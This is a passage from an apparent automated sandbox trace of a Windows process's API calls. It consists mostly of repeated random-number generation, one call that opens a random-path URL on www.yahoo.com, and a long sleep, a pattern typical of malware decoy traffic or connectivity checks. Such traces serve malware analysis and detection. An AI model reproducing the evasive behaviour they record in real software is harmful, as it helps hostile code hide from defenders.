0x7ffc5bcc36b0 [0251.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0251.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fa9, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a16fa9) returned 0x0 [0251.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0251.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fbc, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a16fbc) returned 0x0 [0251.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.894] GetProcessHeap () returned 0x440000 [0251.894] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0251.894] lstrcpyA (in: lpString1=0x472f30, lpString2="Þr³\x17s://www.yahoo.com" | out: lpString1="Þr³\x17s://www.yahoo.com") returned="Þr³\x17s://www.yahoo.com" [0251.894] lstrcatA (in: lpString1="Þr³\x17s://www.yahoo.com", lpString2="/ecw1tgmzd0drzrfvj4ay9a5ipif9fD82gir1mvd/iklshyzqztsVvcj1xw/4zDgy4tz073crtlewttlhbq594h/" | out: lpString1="Þr³\x17s://www.yahoo.com/ecw1tgmzd0drzrfvj4ay9a5ipif9fD82gir1mvd/iklshyzqztsVvcj1xw/4zDgy4tz073crtlewttlhbq594h/") returned="Þr³\x17s://www.yahoo.com/ecw1tgmzd0drzrfvj4ay9a5ipif9fD82gir1mvd/iklshyzqztsVvcj1xw/4zDgy4tz073crtlewttlhbq594h/" [0251.895] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0251.895] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="Þr³\x17s://www.yahoo.com/ecw1tgmzd0drzrfvj4ay9a5ipif9fD82gir1mvd/iklshyzqztsVvcj1xw/4zDgy4tz073crtlewttlhbq594h/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0251.895] GetProcessHeap () returned 0x440000 [0251.895] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0251.895] GetProcessHeap () returned 0x440000 [0251.895] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0251.895] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0251.895] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0251.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0251.896] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0251.896] Sleep (dwMilliseconds=0x1b3c7) [0252.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0252.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.050] GetProcessHeap () returned 0x440000 [0252.050] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b720 [0252.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b721, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b721) returned 0x0 [0252.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b736, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a1b736) returned 0x0 [0252.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") 